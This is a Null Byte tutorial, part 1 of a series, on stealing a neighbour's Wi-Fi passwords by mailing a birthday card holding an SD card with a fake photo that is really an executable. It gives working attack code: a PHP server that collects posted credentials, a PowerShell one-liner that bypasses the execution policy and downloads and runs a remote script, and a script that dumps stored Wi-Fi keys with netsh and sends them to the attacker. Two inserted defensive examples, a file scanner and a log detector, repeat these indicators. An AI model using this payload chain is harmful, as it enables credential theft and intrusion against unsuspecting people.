
How to Hack Anyone’s Wi-Fi Password Using a Birthday Card, Part 1 (Creating the Payload) « Null Byte :: WonderHowTo

With an ordinary birthday card, we can introduce a physical device containing malicious files into someone’s home and deceive them into inserting the device into a computer.

In my last series, we used a Post-it note to trick a neighbor into visiting a website that we control. That kind of attack required a lot of reconnaissance to successfully identify the neighbor’s name. It also required the target user to manually download a file to their computer. Another potential downside to the attack is that the target may become aware that they’re the center of attention.

We generally want to compromise a target in as few steps as possible, so asking our intended target to visit a website, download a file, and then open the file might be a stretch depending on how technically savvy they are.

Understanding This particular Greeting Card Attack

Let’s first take a look at the attack scenario overview to better understand how this hack works. Our goal is to social engineer someone into inserting an SD card into a computer. This can easily be done against our neighbors next door. When the fake “photo” we make on the SD card is opened, our payload will execute, collect the device’s Wi-Fi credentials, and send the data to a server that we control.

However, not all computers come equipped with SD card slots, and not everyone has an external card reader or digital camera that can act as one. It’s certainly possible to substitute a USB flash drive for the SD card, but it’s not unusual to assume there are pictures on an SD card, as most popular digital cameras use them.

In the first part of this series, we’ll start with a bit of hardware reconnaissance. It’s always important to do some kind of hardware recon before creating a payload, because it helps us decide what kind of operating system we’re most likely up against. Then, we’ll create a payload on an SD card and set up a Virtual Private Server (VPS) to receive the Wi-Fi credentials.

In the second part of this tutorial, we’ll convert the payload to an executable and modify the icon to make it appear to be a normal JPG image. When that’s done, we’ll talk about inscribing a greeting card with an enticing note to trick the target into opening files on the SD card, then discuss when and how to deliver the card, as well as protections you can use to make sure you don’t fall victim to this attack.

The real-world applications of this kind of attack are limitless. Using a greeting card or any kind of personalized delivery system to social engineer a target into inserting a device into their computer can be used against large corporations, small businesses, and average everyday computer users. Last month, Taco Bell showed how a bare manila envelope was enough to get someone to insert a USB drive into their computer, but we’re going to have some fun here.

Step 1: Discover Their Hardware Information

Identifying devices connected to the target’s wireless network is important to the success of this attack and has been covered many times on Null Byte before. I suggest using the Airodump-ng method I showed in the Post-it note hack, but you can also use the Kismet method to monitor hardware and enumerate operating systems connecting to the network. Once you have some MAC addresses, you just need to check them online to see which manufacturers they match up with.

Step 2: Find the Right Storage Device

For the payload used in this tutorial, a small 128 MB SD card will be more than adequate. If you’re using the social-engineering method in this article but are opting to use your own custom payload type, be sure to use an SD card appropriately sized to meet your needs. If you’re using a USB flash drive, 1 GB would likely be enough, if you can even find one that small.

When testing this hack, I used a very cheap and generic microSD card which was collecting dust on my desk. Remember, we’ll never use or see this SD card again, so don’t break the bank trying to get something high-end.

If you believe your target is tech-savvy and would understand the difference between a cheap and a high-end SD card, you won’t be able to convince them there’s an interesting 4K video on a 128 MB card. It’s just not possible. In that case, you might have to invest in something higher quality to keep your imaginary social engineering scenario in the realm of the probable. Also, if you use a microSD card, as I did, remember to include an SD card adapter as shown in the image below.

Image by tokyoneon/Null Byte

MicroSD cards are smaller, and most computers and laptops don’t have microSD slots, so be sure to include an adapter. Cameras and smartphones will likely have a microSD card slot, but those are not our target devices; they could serve as an impromptu card reader, though it’s unlikely they would be used that way.

Step 3: Give the Storage Device a Unique Name

When you insert the SD card or USB drive into your computer for the first time, it will likely be named automatically to something generic. Rename your storage device to something very unique like “SanDisk07595,” “HAPPY_BDAY,” or something relevant to what you will write in the greeting card. This will allow the payload to easily locate the drive letter of the storage device when it’s inserted into a computer.

If the storage device name is too generic, like “SD,” and there’s already a device named “SD” connected to the target computer, it will cause complications when executing the payload. Be sure to give the SD card a memorable, unique name.

In Windows, you can change the name of a connected SD card or USB drive by right-clicking on the device and clicking “Rename.” On a Linux system, open up the “Disks” application, select the drive, click on the cogs icon, then “Edit Filesystem.” For this tutorial, I’ll be using images of cats, so I’ll name my SD card “CATZ.”

Step 4: Set Up Your VPS

In order to get the Wi-Fi credentials from the payload we’re creating, we’ll need a VPS to receive and store the data. There are plenty of VPS providers available across the web, such as OVH, VPSdime, VPS.net, and Vultr, but I’ll be using DigitalOcean. If you’re more comfortable with another VPS provider, feel free to set up a Debian or Ubuntu VPS using your preferred provider.

DigitalOcean’s cheapest $5/month plan will work just fine for this hack. To connect to your new DigitalOcean server, enter the below ssh command into a terminal window.

ssh root@Your-VPS-IP-Here

Now that we have our VPS up and running, we’ll need to install PHP. This will allow us to create a simple PHP server to receive or “catch” the credentials after they’ve been sent from the compromised computer.

To install PHP, run the apt-get command below.

sudo apt-get update && sudo apt-get install php

Some distributions install Apache along with PHP whether you want it or not, so be sure to stop any web servers that might be running after installing PHP.

sudo apachectl stop

With that done, we can start our PHP server. We’ll need this server running 24/7 to host our payload and receive the Wi-Fi credentials when someone opens a file on the SD card or USB drive. To start, make a directory called “phpServer” using the below mkdir command.

mkdir phpServer

Then, we’ll change into the phpServer directory using the cd command and create a file called “index.php” using nano.

cd phpServer
nano index.php

We’ll then paste the below PHP script into the nano terminal. Once that’s done, to save and exit the nano terminal, press Ctrl + X, then Y, then Enter.

<?php
// Name the capture file after the sender's IP address and a timestamp.
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("YmdHisms") . ".credz";
// Write the raw POST body (the text the payload sends) straight to that file.
file_put_contents($file, file_get_contents("php://input"));

This is a very simple PHP server, and you don’t need to modify a single line for it to work. When our payload is executed on the compromised device, it will send the Wi-Fi credentials to this PHP server, where they are automatically saved to a “.credz” text file.

To start the PHP server, use the below command.

sudo php -S 0.0.0.0:80 &

The -S tells PHP to start a web server, while 0.0.0.0 tells PHP to host the server on every interface on the VPS. Doing this will allow any device in the world to access files hosted on our PHP server. The 80 is the listening port number; by default, web servers and browsers use port 80 for HTTP. To keep the server from stopping when we kill our SSH connection, we use & at the end of the command to tell the terminal to start the PHP server as a background process. This is the quick and dirty way of keeping our server online long after we close our SSH session.

To verify your PHP server is working, you can use the below cURL command from any Unix-like computer in the world.

curl --data "tokyoneon was here!" http://Your-VPS-IP-Here/index.php

The --data argument will send the “tokyoneon was here!” text to the PHP server, similar to how the payload sends Wi-Fi credentials. Of course, this can say anything you want. After you run the cURL command, there should be a newly created file in the phpServer directory. Use the cat command to read the file contents as I did in the above screenshot.

That’s as far as we’ll go with the VPS for now. We’ll come back in a bit, as we need to save the payload to the phpServer directory.

Step 5: Understand How the Payload Will Work

Let’s begin talking about the payload and have a look at what the target user will see when they view the content on the SD card or USB flash drive enclosed in the greeting card package. One of the “fatcat” photos in the below GIF is a malicious file I created and modified to appear as a normal photo. Can you tell which file is a real photo and which is a payload?

Cat image found at Flickr by Charles Nadeau (CC BY 2.0).

Clicking on either the real cat photo or the payload will cause the cat photo to open. The Windows operating system, going as far back as Windows XP, hides file extensions by default. At a glance, it’s not possible to determine whether the files we’re looking at are actually image types or executables. This is possibly one of the greatest design flaws of the Windows operating system and a security issue that may never be properly addressed.

It’s possible to change the default file manager view, however. Viewing the files using the “Details” or “Content” view will show one of the images as an application. The six other file manager layouts will not display information that would indicate the executable is not actually an image. Even still, some people might not pay attention to the file types being displayed right in front of them.
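Because the name Explorer shows cannot be trusted, a defender checking removable media has to look at the file contents instead. The following is an added example (not code from the original article) that scans a constructed set of “photo” files the way a card-inspection script or mail-room scanner might: it flags double extensions, files that carry a PE header whatever their name or icon, and files whose header does not match the image type they claim. The file names and bytes are constructed for the example.

```python
import os
import struct

# File headers for the image formats a "photo" on a memory card would claim to be.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".ps1", ".lnk"}


def explorer_display_name(name):
    """Simplified model of 'Hide extensions for known file types': drop the last suffix."""
    return os.path.splitext(name)[0]


def is_pe(data):
    """True if data has a DOS 'MZ' stub whose e_lfanew field points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    return data[pe_off:pe_off + 4] == b"PE\x00\x00"


def inspect_file(name, data):
    """Return the findings for one file; an empty list means name and content agree."""
    findings = []
    stem, ext = os.path.splitext(name.lower())
    if ext in EXECUTABLE_EXTS and os.path.splitext(stem)[1] in IMAGE_MAGIC:
        findings.append("double-extension")    # fatcat.png.exe is displayed as fatcat.png
    if is_pe(data):
        findings.append("executable-content")  # a program, whatever its icon or name
    elif ext in IMAGE_MAGIC and not data.startswith(IMAGE_MAGIC[ext]):
        findings.append("header-mismatch")     # claims an image type it is not
    return findings


def scan_media(files):
    """files maps name -> bytes (e.g. read from a mounted card); return only suspicious entries."""
    report = {name: inspect_file(name, data) for name, data in files.items()}
    return {name: f for name, f in report.items() if f}


def fake_pe():
    """Constructed, minimal PE-shaped blob for the sample data; it is not a real program."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)   # e_lfanew: PE signature right after the stub
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20


# Constructed contents of a "photo" card, keyed by file name.
SAMPLE_MEDIA = {
    "fatcat1.png": IMAGE_MAGIC[".png"] + b"\x00" * 32,  # genuine-looking image
    "fatcat2.png.exe": fake_pe(),                      # shown by Explorer as fatcat2.png
    "fatcat3.jpg": fake_pe(),                          # program renamed to an image extension
    "fatcat4.jpg": b"GIF89a" + b"\x00" * 32,           # an image, but not the type it claims
}

if __name__ == "__main__":
    for name, findings in scan_media(SAMPLE_MEDIA).items():
        print("%-16s shown as %-12s -> %s" % (name, explorer_display_name(name), ", ".join(findings)))
```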

What Is PowerShell?

PowerShell is a scripting language that Microsoft developed to help IT professionals configure systems and automate administrative tasks. Hackers have been using and abusing PowerShell to achieve their goals since 2006, when it was introduced for the Windows XP and Vista operating systems.

The executables (or fake photos) on the SD card or USB drive will contain “Stage 1” of the attack. The first stage is a simple PowerShell one-liner that makes an HTTP request and downloads the larger PowerShell script (“Stage 2”) from our VPS. The larger script is the actual payload that grabs Wi-Fi passwords and sends them to our VPS.

1. What the Stage 1 Script Looks Like

Here’s what the “Stage 1” script looks like, the one that will be loaded onto the storage device the target will receive:

powershell -ExecutionPolicy Bypass "IEX (New-Object Net.WebClient).DownloadString('http://YOUR-VPS-IP-HERE/payload.ps1');"

It’s very simple and small. All it does is fetch and automatically execute the larger PowerShell script being hosted on our VPS.

Windows operating systems sometimes have restrictive PowerShell execution policies which can cause our scripts to fail. This creates a small obstacle for hackers and systems administrators alike. Fortunately, there are many ways of bypassing this. The -ExecutionPolicy Bypass argument used in the “Stage 1” PowerShell script will allow us to easily bypass any execution policies enabled on the target device. (Microsoft itself documents the execution policy as a safety feature rather than a security boundary, which is why it is so easy to get around; it is no substitute for application control or script block logging.)

2. What the Stage 2 Script Looks Like

Here’s what the larger “Stage 2” script looks like:

Add-Type -AssemblyName System.Web;

$yourVPS = "http://YOUR-VPS-IP-HERE/index.php";

$SDname = (gwmi win32_volume -f 'label="SD-CARD-NAME-HERE"').Name;
Invoke-Item -Path ("$SDname" + "REAL-IMAGE-NAME-HERE.png");

Foreach ($path in [System.IO.Directory]::EnumerateFiles("C:\ProgramData\Microsoft\Wlansvc\Profiles","*.xml","AllDirectories")) {

Try {
$oXml = New-Object System.XML.XMLDocument;
$oXml.Load($path);
$ssid = $oXml.WLANProfile.SSIDConfig.SSID.name;
$netinfo = netsh.exe wlan show profiles name="$ssid" key=clear;
$pass = (($netinfo | Select-String -Pattern "Key Content") -split ":")[1].Trim();
$sendData += "ESSID: " + ($ssid) + "`n" + "PASSWORD: " + ($pass) + "`n`n";
} Catch {}

}

Invoke-WebRequest -Uri $yourVPS -Method 'POST' -Body $sendData;

Step 6: Create the Stage 2 Script on Your VPS

We’ll go over what the “Stage 2” script does in a moment, but first we’ll need to save this PowerShell payload to the phpServer directory we created earlier. SSH back into your VPS and cd back into your phpServer directory.

ssh root@Your-Server-IP-Address
cd phpServer

You can use nano again to create a file called “payload.ps1.”

nano payload.ps1

Before closing and saving the nano terminal, there are three lines you’ll need to modify:

  1. Change “YOUR-VPS-IP-HERE” to the actual IP address of your VPS. This tells the PowerShell payload where to send the Wi-Fi credentials after they’ve been discovered.
  2. Change “SD-CARD-NAME-HERE” to the name of your SD card or USB drive. I named my SD card “CATZ.” This is the line of PowerShell that searches the target computer for the drive letter belonging to your storage device.
  3. Change “REAL-IMAGE-NAME-HERE.png” to the file name of an actual image on the root of the SD card or USB flash drive. This causes the real image to open when the payload is opened. This step isn’t absolutely necessary, but it will certainly help diminish suspicion when someone clicks on the payload. If you want to skip this step, you’ll have to remove the two lines of the PowerShell script that look for the storage device name and open the image.

To save and exit the nano terminal, press Ctrl + X, then Y, then Enter. You should now have “payload.ps1” and “index.php” files in your phpServer directory.

What the Stage 2 Script Actually Does

Let’s reiterate what the “Stage 2” PowerShell script will do, just to make sure it’s completely clear.

First, it will find the drive letter of the SD card and open a real image on the card. Doing this will keep the target user from becoming suspicious of images that don’t actually open.

Then, the PowerShell script will loop through all of the Wi-Fi network SSID names stored on the computer (found in the XML documents in the “C:\ProgramData\Microsoft\Wlansvc\Profiles” directory) and run the netsh command for each SSID to pull the Wi-Fi passwords in plain text (labeled “Key Content”). More on this in the second part of this series.

Last, it parses the netsh output text, takes the discovered Wi-Fi SSIDs and passwords, concatenates them into the “$sendData” string, and sends them to the PHP server running on our VPS.

To look under the hood at how the netsh command is used to get us the plain-text passwords, let’s take a second to look at its output. If you’re using a Windows computer right now, you can type the below netsh command into a cmd terminal to view your own stored wireless passwords.

netsh wlan show profiles name="<your wifi router's SSID name>" key=clear

The netsh command will produce a bunch of information related to the Wi-Fi network, but most of it is useless to us. Scroll down a bit until you see the “Key Content” line, which shows the Wi-Fi password in plain text. Below is an example screenshot of the netsh command’s output:

You’ll notice our “Stage 2” PowerShell script parses this text by using “Select-String -Pattern” to look for the line that contains the text “Key Content,” then splits that line on the colon (“:”), takes the second element of the resulting array with “[1]” (remember, the first index in an array is zero), and finally calls “.Trim()” to remove any whitespace characters from the left or right to get the final value.
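Both stages leave recognisable text in PowerShell script block logging (Windows event 4104): the Stage 1 cradle with -ExecutionPolicy Bypass, IEX and DownloadString, and the Stage 2 collector with netsh wlan show profiles ... key=clear followed by an HTTP POST. The following is an added detection example, not code from the original article, that scores constructed script-block text against those indicators; the indicator names, weights and threshold are this example’s own choices, and 198.51.100.7 is a documentation address.

```python
import re

# Indicators of the two-stage technique described on this page, matched against
# script-block text (e.g. the ScriptBlockText field of event 4104). Names and
# weights are this example's own, not a vendor scheme.
INDICATORS = [
    ("execution-policy-bypass", r"-Ex(?:ecutionPolicy)?\s+Bypass\b", 2),
    ("web-client-fetch", r"Net\.WebClient\)?\.DownloadString|Invoke-WebRequest|\biwr\b", 2),
    ("invoke-expression", r"\bIEX\b|Invoke-Expression", 2),
    ("wlan-key-clear", r"netsh(?:\.exe)?\s+wlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear", 3),
    ("wlan-profile-store", r"Wlansvc\\Profiles", 2),
    ("http-post-body", r"-Method\s+['\"]?POST['\"]?.*-Body\b", 1),
]
COMPILED = [(name, re.compile(rx, re.I), weight) for name, rx, weight in INDICATORS]


def score_script_block(text):
    """Return (score, matched indicator names) for one script block."""
    hits = [name for name, rx, _ in COMPILED if rx.search(text)]
    score = sum(weight for name, _, weight in COMPILED if name in hits)
    return score, hits


def triage(events, threshold=4):
    """Return the ids of events whose score reaches the threshold.

    A single indicator (an admin listing profiles, a legitimate download) stays
    below the threshold; the stage-1 cradle and the stage-2 collector each
    combine several indicators and are flagged.
    """
    return [eid for eid, text in events if score_script_block(text)[0] >= threshold]


# Constructed sample script blocks, as they would appear in ScriptBlockText.
SAMPLE_EVENTS = [
    ("evt-1", r"Get-ChildItem C:\Logs -Recurse | Where-Object Length -gt 1MB"),
    ("evt-2", "Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"),
    ("evt-3", "netsh wlan show profiles"),  # profile names only, no keys requested
    ("evt-4", "powershell -ExecutionPolicy Bypass \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://198.51.100.7/payload.ps1');\""),
    ("evt-5", "$netinfo = netsh.exe wlan show profiles name=\"$ssid\" key=clear;\n"
              "Invoke-WebRequest -Uri $yourVPS -Method 'POST' -Body $sendData;"),
]

if __name__ == "__main__":
    for eid, text in SAMPLE_EVENTS:
        print(eid, score_script_block(text))
    print("flagged:", triage(SAMPLE_EVENTS))  # flagged: ['evt-4', 'evt-5']
```

Enabling script block logging is what makes this visible at all; without it, a short-lived cradle like Stage 1 leaves little more than a process-creation record.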

Stay Tuned for Part 2 …

Now that we have the SD card (or USB flash drive, if you went that route), the PHP server set up on our VPS, and the PowerShell “Stage 2” payload ready to go, we can begin converting the “Stage 1” PowerShell script to an executable and delivering the greeting card to our intended target.

Cover image and screenshots by tokyoneon/Null Byte
